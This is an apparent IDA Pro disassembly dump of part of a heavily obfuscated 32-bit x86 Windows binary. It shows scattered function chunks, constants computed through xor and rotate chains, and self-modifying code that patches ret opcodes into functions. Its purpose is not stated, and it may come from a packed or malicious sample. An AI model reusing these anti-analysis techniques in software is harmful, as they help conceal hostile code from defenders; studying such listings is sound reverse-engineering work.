loc_454165: ; CODE XREF: sub_4406F1+193Ej
jmp loc_4493DA
; END OF FUNCTION CHUNK FOR sub_4406F1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4396F5
loc_45416A: ; CODE XREF: sub_4396F5+1991Cj
jnp loc_450621
loc_454170: ; CODE XREF: sub_4396F5:loc_43D1E1j
push edx
push 0B149501Bh
pop edx
xor edx, 8C08269Fh
jnz loc_444B2C
; END OF FUNCTION CHUNK FOR sub_4396F5
; START OF FUNCTION CHUNK FOR sub_446F9A
loc_454183: ; CODE XREF: sub_446F9A+4943j
test esi, ebp
jmp loc_459D84
; END OF FUNCTION CHUNK FOR sub_446F9A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4424E8
loc_45418A: ; CODE XREF: sub_44B526-C081j
; sub_446073:loc_445AF7j ...
mov eax, [ebp-0Ch]
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_4424E8
; ---------------------------------------------------------------------------
loc_454191: ; CODE XREF: ut7h7i2x:0043E985j
jmp sub_44ED9F
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_454196 proc near ; CODE XREF: sub_439BB9+6p
; sub_445EDA-B35Dp ...
; FUNCTION CHUNK AT 004468EA SIZE 00000005 BYTES
push ebp
mov ebp, esp
jmp loc_4468EA
sub_454196 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4549F0
loc_45419E: ; CODE XREF: sub_4549F0-14928j
; ut7h7i2x:00447849j ...
add ebx, 44D6A1Dh
xchg ebx, [esp+0]
jmp sub_44ED9F
; END OF FUNCTION CHUNK FOR sub_4549F0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_38. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_4541AD: ; CODE XREF: ut7h7i2x:00457C49j
jmp loc_43BCDC
; ---------------------------------------------------------------------------
loc_4541B2: ; CODE XREF: ut7h7i2x:0043A49Bj
jmp loc_450DC7
; ---------------------------------------------------------------------------
loc_4541B7: ; CODE XREF: ut7h7i2x:loc_44E276j
xchg edx, [esp]
jmp loc_45156E
; ---------------------------------------------------------------------------
push 98C67FA3h
pop eax
xor eax, 0C32BAA74h
or eax, 0A046FFA0h
jmp loc_447010
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44305D
loc_4541D6: ; CODE XREF: sub_44305D:loc_446280j
push esi
push 0CD4791B2h
pop esi
rol esi, 1Eh
jmp loc_452042
; END OF FUNCTION CHUNK FOR sub_44305D
; ---------------------------------------------------------------------------
test esi, 32951CD1h
jmp loc_43FCE8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449E96
loc_4541F0: ; CODE XREF: sub_449E96+AD0j
mov eax, [esp+0]
push edx
call sub_4396F5
loc_4541F9: ; CODE XREF: sub_445188:loc_44E81Dj
push 54260A18h
jmp loc_4405F3
; END OF FUNCTION CHUNK FOR sub_449E96
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C0DA
loc_454203: ; CODE XREF: sub_43C0DA+1E2A9j
jl loc_43D07E
cdq
cmp ebp, 0F97D4E6Ah
jmp loc_445158
; END OF FUNCTION CHUNK FOR sub_43C0DA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A513
loc_454215: ; CODE XREF: sub_43A513:loc_45985Cj
mov edi, ecx
jmp loc_450E66
; END OF FUNCTION CHUNK FOR sub_43A513
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_45421C proc near ; CODE XREF: sub_45612F-EC0Ej
retn
sub_45421C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455E0B
loc_45421D: ; CODE XREF: sub_455E0B+337Fj
jmp loc_447D92
; END OF FUNCTION CHUNK FOR sub_455E0B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E9E4
loc_454222: ; CODE XREF: sub_44E9E4:loc_45A557j
xor edi, 1A513912h
jmp loc_4520E4
; END OF FUNCTION CHUNK FOR sub_44E9E4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44937E
loc_45422D: ; CODE XREF: sub_44937E-763Aj
push eax
ror eax, 11h
push offset sub_450DA8
jmp nullsub_188
; END OF FUNCTION CHUNK FOR sub_44937E
; ---------------------------------------------------------------------------
loc_45423B: ; CODE XREF: ut7h7i2x:loc_4590ABj
jz loc_4579AB
; START OF FUNCTION CHUNK FOR sub_447917
loc_454241: ; CODE XREF: sub_447917+FD2Bj
jmp nullsub_296
; END OF FUNCTION CHUNK FOR sub_447917
; ---------------------------------------------------------------------------
loc_454246: ; CODE XREF: ut7h7i2x:004405E3j
jmp locret_43ABAF
; ---------------------------------------------------------------------------
sub esi, eax
jmp loc_459D79
; ---------------------------------------------------------------------------
locret_454252: ; CODE XREF: ut7h7i2x:loc_45603Aj
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_454253: ; CODE XREF: sub_442B3B:loc_4450F1j
jnz loc_45246C
mov eax, [ebp+8]
or dword ptr [eax-8], 4
mov eax, [ebp-4]
movzx eax, byte ptr [eax]
jmp loc_44C76C
; ---------------------------------------------------------------------------
loc_45426B: ; CODE XREF: sub_442B3B:loc_43AF3Bj
push offset sub_4524E2
jmp sub_455F37
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
loc_454275: ; CODE XREF: ut7h7i2x:00439221j
shr edi, 1
; =============== S U B R O U T I N E =======================================
sub_454277 proc near ; CODE XREF: sub_45A070:loc_4472D6p
var_10 = dword ptr -10h
; FUNCTION CHUNK AT 0044321E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448A83 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449AA7 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0045465A SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004562AD SIZE 00000011 BYTES
xchg edx, [esp+10h+var_10]
pop edx
push 2A5C3BB0h
pop eax
jmp loc_448A83
sub_454277 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455111
loc_454286: ; CODE XREF: sub_455111:loc_443C87j
cmp al, 0A4h
jz loc_4518E6
jmp loc_445918
; END OF FUNCTION CHUNK FOR sub_455111
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447F0A
loc_454293: ; CODE XREF: sub_447F0A:loc_43E9E8j
; ut7h7i2x:00445655j
xor eax, 46C1335Dh
shl eax, cl
and edx, eax
setnz byte ptr [ebp-5]
call sub_440E38
mov edx, ds:dword_4513A4
mov ebx, [edx]
call sub_43E592
; END OF FUNCTION CHUNK FOR sub_447F0A
; START OF FUNCTION CHUNK FOR sub_447EB5
loc_4542B3: ; CODE XREF: sub_447EB5+7759j
jmp loc_43EE32
; END OF FUNCTION CHUNK FOR sub_447EB5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4475A8
loc_4542B8: ; CODE XREF: sub_4475A8:loc_453090j
or eax, 37175D5Fh
add eax, 404CCE7Eh
xchg eax, [esp-8+arg_4]
jmp sub_43F058
; END OF FUNCTION CHUNK FOR sub_4475A8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450231
loc_4542CC: ; CODE XREF: sub_450231:loc_43AECFj
mov edi, 2B2A22D5h
or ecx, edi
jmp loc_44F0F0
; END OF FUNCTION CHUNK FOR sub_450231
; ---------------------------------------------------------------------------
loc_4542D8: ; CODE XREF: ut7h7i2x:0044EAE9j
push 0ADBB73F4h
pop edx
rol edx, 1Dh
or edx, 9798280Ah
add edx, 0BFC4F079h
add edx, ebp
add edx, 0A87BA105h
mov edx, [edx]
jmp loc_449F86
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D1F0
loc_4542FC: ; CODE XREF: sub_44D1F0-DDEAj
jnb loc_44443F
loc_454302: ; CODE XREF: sub_44D1F0:loc_43CDD3j
push 74BF9BA9h
pop eax
sub eax, 8700589Fh
add eax, 0C44F96Fh
call sub_44F300
; END OF FUNCTION CHUNK FOR sub_44D1F0
; START OF FUNCTION CHUNK FOR sub_43BE93
loc_454319: ; CODE XREF: sub_43BE93+12E5j
jmp loc_444DDA
; END OF FUNCTION CHUNK FOR sub_43BE93
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_317. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45292B
loc_45431F: ; CODE XREF: sub_45292B:loc_44652Cj
mov edx, [edx]
popf
mov byte ptr [eax+edx], 0
inc [ebp+var_4]
cmp [ebp+var_4], 100h
jnz loc_45AD3A
jmp loc_44EC3F
; END OF FUNCTION CHUNK FOR sub_45292B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_45433B: ; CODE XREF: sub_43AB62+143CDj
jge loc_4495B4
loc_454341: ; CODE XREF: sub_4593AA+9j
jmp loc_452538
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443BC5
loc_454346: ; CODE XREF: sub_443BC5-3907j
jmp loc_4534B2
; END OF FUNCTION CHUNK FOR sub_443BC5
; ---------------------------------------------------------------------------
cmp edi, 86A12376h
jmp loc_43A4E8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448CDC
loc_454356: ; CODE XREF: sub_448CDC+Cj
jz loc_43FEB0
jmp loc_43BA37
; END OF FUNCTION CHUNK FOR sub_448CDC
; =============== S U B R O U T I N E =======================================
sub_454361 proc near ; DATA XREF: ut7h7i2x:00452331o
jnz loc_456501
push offset loc_442736
jmp loc_43E9E3
sub_454361 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44AD6F
loc_454371: ; CODE XREF: sub_44AD6F+6j
push 15A2AC99h
pop eax
sub eax, 7CA90567h
xor eax, ds:4000F6h
add eax, 7E382508h
rol eax, 11h
add eax, 0ED7EF5E3h
push offset loc_453C3F
jmp nullsub_554
; END OF FUNCTION CHUNK FOR sub_44AD6F
; =============== S U B R O U T I N E =======================================
sub_45439C proc near ; CODE XREF: sub_43F7A5-5160p
; ut7h7i2x:0043F146j
; FUNCTION CHUNK AT 00459805 SIZE 0000000D BYTES
xchg ecx, [esp+0]
pop ecx
shl eax, 3
add [ebp-8], eax
jmp loc_459805
sub_45439C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4543AB proc near ; DATA XREF: sub_44B909+Co
push 42E5B80Eh
pop edx
or edx, ds:4000F8h
xor edx, 0A506F599h
add eax, edx
push offset loc_4445B6
jmp nullsub_189
sub_4543AB endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456590
loc_4543C9: ; CODE XREF: sub_456590-CCD0j
xchg edi, [esp+0]
jmp loc_440A04
; END OF FUNCTION CHUNK FOR sub_456590
; ---------------------------------------------------------------------------
or esi, 84F01D35h
jmp sub_4502AD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44551B
loc_4543DC: ; CODE XREF: sub_44551B-DF3j
or ebx, 0D21AB3A8h
not esi
jmp loc_44A583
; END OF FUNCTION CHUNK FOR sub_44551B
; =============== S U B R O U T I N E =======================================
sub_4543E9 proc near ; CODE XREF: ut7h7i2x:loc_459FE3j
; DATA XREF: sub_452AE2:loc_449DF5o
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00442E21 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044608B SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00446651 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004537E4 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004585CB SIZE 00000005 BYTES
xor eax, 0E40F7299h
add eax, ebp
push ecx
push 0B5A2E65Bh
pop ecx
add ecx, 0DE4AEDE7h
and ecx, 0A308D53Ah
jmp loc_4537E4
sub_4543E9 endp
; ---------------------------------------------------------------------------
loc_454409: ; CODE XREF: ut7h7i2x:0044FE4Ej
jz loc_456678
jmp loc_450A3D
; ---------------------------------------------------------------------------
loc_454414: ; CODE XREF: ut7h7i2x:00443A7Dj
shl edi, 3
ror ebp, 10h
loc_45441A: ; CODE XREF: ut7h7i2x:loc_44A1CBj
push 0
push 0
jmp loc_44FAA9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446320
loc_454423: ; CODE XREF: sub_446320+9AA5j
js loc_4412CB
push 9C12DA4Eh
jmp loc_448099
; END OF FUNCTION CHUNK FOR sub_446320
; ---------------------------------------------------------------------------
loc_454433: ; CODE XREF: ut7h7i2x:0045090Cj
retn
; ---------------------------------------------------------------------------
loc_454434: ; CODE XREF: ut7h7i2x:00457F5Bj
jmp locret_457722
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4462B0
loc_454439: ; CODE XREF: sub_4462B0+B575j
jmp loc_43D56D
; END OF FUNCTION CHUNK FOR sub_4462B0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A5C0
loc_45443E: ; CODE XREF: sub_43A5C0+Ej
jmp loc_445A39
; END OF FUNCTION CHUNK FOR sub_43A5C0
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
loc_454444: ; CODE XREF: ut7h7i2x:0045658Bj
jmp sub_450087
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E2C4
loc_454449: ; CODE XREF: sub_44E2C4+2184j
jmp sub_43AED9
; END OF FUNCTION CHUNK FOR sub_44E2C4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_45444E proc near ; CODE XREF: ut7h7i2x:loc_455833p
; sub_459BF0+Dp
push ebp
mov ebp, esp
sub_45444E endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_43B7F7
loc_454451: ; CODE XREF: sub_43B7F7:loc_44DEE7j
call sub_457453
loc_454456: ; CODE XREF: sub_43E6CC-3C3Dj
jmp loc_44E6F1
; END OF FUNCTION CHUNK FOR sub_43B7F7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455060
loc_45445B: ; CODE XREF: sub_455060:loc_448863j
jnz loc_450845
jmp loc_4517A6
; END OF FUNCTION CHUNK FOR sub_455060
; =============== S U B R O U T I N E =======================================
sub_454466 proc near ; CODE XREF: sub_44E8A5:loc_44AE45p
; ut7h7i2x:loc_44B82Fj
; FUNCTION CHUNK AT 0043A7AC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443E88 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004472F2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044CAF1 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044EDAE SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00454013 SIZE 00000010 BYTES
xchg eax, [esp+0]
pop eax
jo loc_454013
call sub_454DE8
loc_454475: ; CODE XREF: sub_4462B0+13466j
jmp loc_4472F2
sub_454466 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov ds:off_41D088, eax
lea eax, sub_4558CC
mov byte ptr [eax], 0C3h
jmp sub_4558CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4558CC
loc_45448E: ; CODE XREF: sub_4558CCj
pop edx
mov eax, [esp+0]
push esi
jmp loc_455EA2
; END OF FUNCTION CHUNK FOR sub_4558CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443816
loc_454498: ; CODE XREF: sub_443816+Bj
mov ebp, edx
xchg ebp, [esp+0]
push ecx
mov ecx, eax
jmp loc_43C433
; END OF FUNCTION CHUNK FOR sub_443816
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444A4D
loc_4544A5: ; CODE XREF: sub_444A4D:loc_457ABCj
call sub_4508DB
push 0C83C8744h
pop eax
add eax, 0EA8B3C4Ah
rol eax, 0Eh
push offset sub_444A4D
jmp loc_449E31
; END OF FUNCTION CHUNK FOR sub_444A4D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455111
loc_4544C3: ; CODE XREF: sub_455111-2F6j
and eax, 8976D17h
or eax, 9F9D79A0h
jnz loc_439EC2
; END OF FUNCTION CHUNK FOR sub_455111
; START OF FUNCTION CHUNK FOR sub_43A556
loc_4544D5: ; CODE XREF: sub_43A556+94ABj
jmp loc_451398
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
mov [ebp+0], ecx
shl eax, 10h
pop edx
jmp loc_458B5F
; =============== S U B R O U T I N E =======================================
sub_4544E6 proc near ; CODE XREF: sub_43F365:loc_43A57Bp
; ut7h7i2x:0044979Fj
; FUNCTION CHUNK AT 00439275 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00439C9B SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0043AE92 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F641 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FDF9 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043FFEF SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004424F3 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004428D4 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00443EE2 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044C006 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044D31F SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044D3E1 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0044DAC3 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044F906 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00453074 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00454734 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458099 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458442 SIZE 00000003 BYTES
; FUNCTION CHUNK AT 0045844A SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045A594 SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
sub al, 99h
mov edx, [ebp-4]
imul byte ptr [edx]
loc_4544F1: ; CODE XREF: sub_4462B0+DAA0j
cmp al, 0A4h
jnz loc_44D3F1
mov eax, [ebp-4]
jmp loc_44D3E1
sub_4544E6 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_454501: ; CODE XREF: ut7h7i2x:0044C86Aj
js loc_453FCF
mov ebp, ebx
add ecx, ebx
jmp loc_455BBE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_454510: ; CODE XREF: sub_43AB62+1155Cj
jns loc_439EC8
shl edx, 0Bh
rol ecx, 4
loc_45451C: ; CODE XREF: sub_43AB62:loc_4436A7j
push 54000775h
jmp loc_455FDD
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C1E5
loc_454526: ; CODE XREF: sub_43C1E5:loc_440E9Cj
; sub_43C1E5+5FF8j
lea eax, [ebp-24h]
push esi
loc_45452A: ; CODE XREF: ut7h7i2x:loc_45669Bj
push eax
pop esi
xchg esi, [esp+4+var_4]
push 40h
push 0FEB1BB5Dh
pop eax
jmp loc_448FD8
; END OF FUNCTION CHUNK FOR sub_43C1E5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C791
loc_45453C: ; CODE XREF: sub_44C791+9239j
add esi, 0C7F350D7h
rol esi, 0Fh
jb loc_43CF58
loc_45454B: ; CODE XREF: sub_445E9E+13E98j
jmp nullsub_232
; END OF FUNCTION CHUNK FOR sub_44C791
; ---------------------------------------------------------------------------
jmp locret_445972
; ---------------------------------------------------------------------------
mov esi, edx
jmp loc_43B3E0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450FDE
loc_45455C: ; CODE XREF: sub_450FDE+22C8j
or ebx, 0D3EF855Ch
js loc_442294
loc_454568: ; CODE XREF: sub_4431FF+1214Cj
jmp loc_4580E8
; END OF FUNCTION CHUNK FOR sub_450FDE
; ---------------------------------------------------------------------------
loc_45456D: ; CODE XREF: ut7h7i2x:00439FFBj
jmp loc_458488
; ---------------------------------------------------------------------------
mov ebx, ebp
adc esi, ebx
jmp loc_44228C
; ---------------------------------------------------------------------------
loc_45457B: ; CODE XREF: ut7h7i2x:loc_4592C6j
; ut7h7i2x:004592DFj
add esi, 2C8E2849h
push offset loc_441749
jmp loc_43BAF3
; =============== S U B R O U T I N E =======================================
sub_45458B proc near ; CODE XREF: ut7h7i2x:0044D649j
; sub_44EC28+2p
xchg ecx, [esp+0]
pop ecx
pop ebp
retn
sub_45458B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_454591: ; CODE XREF: ut7h7i2x:00446354j
jmp loc_4547D4
; =============== S U B R O U T I N E =======================================
sub_454596 proc near ; CODE XREF: sub_452EED+3786p
; sub_45A8C1+4p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004472DB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458EE2 SIZE 0000000D BYTES
push ebx
mov ebx, eax
jmp loc_4472DB
sub_454596 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_45459E proc near ; CODE XREF: sub_4497C1:loc_450378p
; ut7h7i2x:0045998Dj
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 00457C12 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A0E4 SIZE 0000000F BYTES
xchg esi, [esp+0]
pop esi
xchg ebx, [esp-4+arg_0]
mov edx, ebx
pop ebx
mov eax, [esp-8+arg_4]
push edx
jmp loc_457C12
sub_45459E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4545B1 proc near ; CODE XREF: sub_43AA94:loc_44572Aj
var_4 = dword ptr -4
push ebx
push 0C9F3FCB1h
pop ebx
rol ebx, 0Bh
add ebx, 605E3AC1h
call sub_4587E9
loc_4545C6: ; CODE XREF: sub_44C87F:loc_4400E9j
mov esp, ebp
xchg eax, [esp+4+var_4]
mov ebp, eax
pop eax
retn
sub_4545B1 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B5CF
loc_4545CF: ; CODE XREF: sub_44B5CF-5B4Ej
rol eax, 1Bh
push ebp
jmp loc_4487D8
; END OF FUNCTION CHUNK FOR sub_44B5CF
; =============== S U B R O U T I N E =======================================
sub_4545D8 proc near ; DATA XREF: ut7h7i2x:0043F40Do
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004397D2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043DCE6 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004439AB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447C81 SIZE 0000001B BYTES
push edx
mov edx, ebx
xchg edx, [esp+4+var_4]
push 5523C6E5h
pop ebx
sub ebx, 70A7D07h
add ebx, 1714FBE0h
and ebx, 0FCDB1A62h
jmp loc_4397D2
sub_4545D8 endp
; =============== S U B R O U T I N E =======================================
sub_4545FB proc near ; CODE XREF: sub_43DC5C+Dj sub_44399Bp ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0043B815 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DC6E SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0045597A SIZE 00000014 BYTES
jnb loc_43DC6E
pop edx
mov eax, [esp-8+arg_4]
push edx
call sub_45173A
mov eax, 38F24592h
push eax
jmp loc_43B815
sub_4545FB endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_454616: ; CODE XREF: ut7h7i2x:loc_4584F8j
jmp ds:off_41D12C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444029
loc_45461C: ; CODE XREF: sub_444029+FF57j
jmp loc_44F67E
; END OF FUNCTION CHUNK FOR sub_444029
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BD1
loc_454621: ; CODE XREF: sub_439BD1+C303j
jmp loc_45A6A1
; END OF FUNCTION CHUNK FOR sub_439BD1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446F56
loc_454626: ; CODE XREF: sub_43DCFF:loc_43CC3Fj
; sub_446F56-9790j ...
jb loc_454AEC
loc_45462C: ; CODE XREF: ut7h7i2x:00454CF4j
pop edx
mov eax, [esp+0]
push edi
mov edi, edx
xchg edi, [esp+4+var_4]
loc_454636: ; CODE XREF: sub_4549F0:loc_446FDFj
push offset sub_452F03
jmp loc_44CB6E
; END OF FUNCTION CHUNK FOR sub_446F56
; ---------------------------------------------------------------------------
loc_454640: ; CODE XREF: ut7h7i2x:0044B840j
; ut7h7i2x:0045019Dj
rol esi, 6
sub esi, 0A1FE7181h
and esi, 0B13D0488h
push offset sub_43999F
jmp loc_43EC94
; ---------------------------------------------------------------------------
locret_454659: ; CODE XREF: ut7h7i2x:loc_448805j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454277
loc_45465A: ; CODE XREF: sub_454277:loc_448A83j
sub eax, 95DABED6h
xor eax, 479D3B34h
add eax, ebp
add eax, 2CE3B012h
jmp loc_449AA7
; END OF FUNCTION CHUNK FOR sub_454277
; ---------------------------------------------------------------------------
push edx
push 4D8D0714h
pop edx
rol edx, 16h
sub edx, 0C8FDC15Eh
add edx, 0C026037h
test edx, 200h
jmp loc_44D35C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4506D3
loc_454694: ; CODE XREF: sub_4506D3:loc_4506DBj
jl loc_44DCAB
xor ebp, 7DE326EFh
rol ecx, 16h
jmp loc_44DCAB
; END OF FUNCTION CHUNK FOR sub_4506D3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44986A
loc_4546A8: ; CODE XREF: sub_44986A+19j
lea eax, sub_453FFB
mov byte ptr [eax], 0C3h
jmp sub_453FFB
; END OF FUNCTION CHUNK FOR sub_44986A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453FFB
loc_4546B6: ; CODE XREF: sub_453FFB+1j
mov eax, [esp+0]
push edx
call sub_45499E
mov eax, 86B13FACh
jmp loc_453E64
; END OF FUNCTION CHUNK FOR sub_453FFB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_477. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44445F
loc_4546CA: ; CODE XREF: sub_44445F+Dj
push edi
push 950FB330h
xchg ebp, [esp+0]
mov edi, ebp
pop ebp
rol edi, 1Bh
jmp loc_44F318
; END OF FUNCTION CHUNK FOR sub_44445F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444273
loc_4546DE: ; CODE XREF: sub_444273+B38Aj
add edx, 3DAA89CBh
mov edx, [edx]
imul byte ptr [edx]
cmp al, 0A4h
jz loc_44BE57
jmp loc_450A14
; END OF FUNCTION CHUNK FOR sub_444273
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444374
loc_4546F5: ; CODE XREF: sub_444374:loc_452430j
jz loc_458455
jmp loc_44EF72
; END OF FUNCTION CHUNK FOR sub_444374
; =============== S U B R O U T I N E =======================================
sub_454700 proc near ; DATA XREF: sub_44022F:loc_448A92o
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00454C52 SIZE 0000000A BYTES
add eax, [esp+0]
adc edx, [esp+arg_0]
add esp, 8
movzx eax, word ptr [eax]
shl eax, 2
mov edx, [ebp-14h]
mov edx, [edx+1Ch]
add edx, [ebp-4]
jmp loc_454C52
sub_454700 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_45471E: ; CODE XREF: ut7h7i2x:loc_45771Dj
and edx, 0AF065ADCh
push ebx
shl ecx, 7
loc_454728: ; CODE XREF: ut7h7i2x:0043FF52j
jmp loc_449FC9
; ---------------------------------------------------------------------------
cmp edx, ecx
jmp loc_446407
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4544E6
loc_454734: ; CODE XREF: sub_4544E6-11BFAj
jz loc_458445
jmp loc_443EE2
; END OF FUNCTION CHUNK FOR sub_4544E6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444273
loc_45473F: ; CODE XREF: sub_444273-75C7j
jge loc_457744
loc_454745: ; CODE XREF: sub_444273:loc_450A14j
mov eax, [ebp-4]
cmp byte ptr [eax], 0F1h
jnz loc_44BE5C
jmp loc_43B3B5
; END OF FUNCTION CHUNK FOR sub_444273
; ---------------------------------------------------------------------------
loc_454756: ; DATA XREF: sub_442B3B-37B8o
xchg esi, [esp]
mov edx, esi
pop esi
or edx, 929B5E79h
sub edx, 0B096D123h
add edx, 0B7E39459h
call sub_44ED9F
push eax
jmp loc_44DDD9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CA2D
loc_454779: ; CODE XREF: sub_43CA2D:loc_45739Bj
mov byte ptr [eax], 0C3h
jmp sub_43CD08
; END OF FUNCTION CHUNK FOR sub_43CA2D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CD08
loc_454781: ; CODE XREF: sub_43CD08j
pop edx
mov eax, [esp+0]
push edx
call sub_4396F5
mov eax, 0D504D785h
call sub_43AA94
jmp loc_448800
; END OF FUNCTION CHUNK FOR sub_43CD08
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4462B0
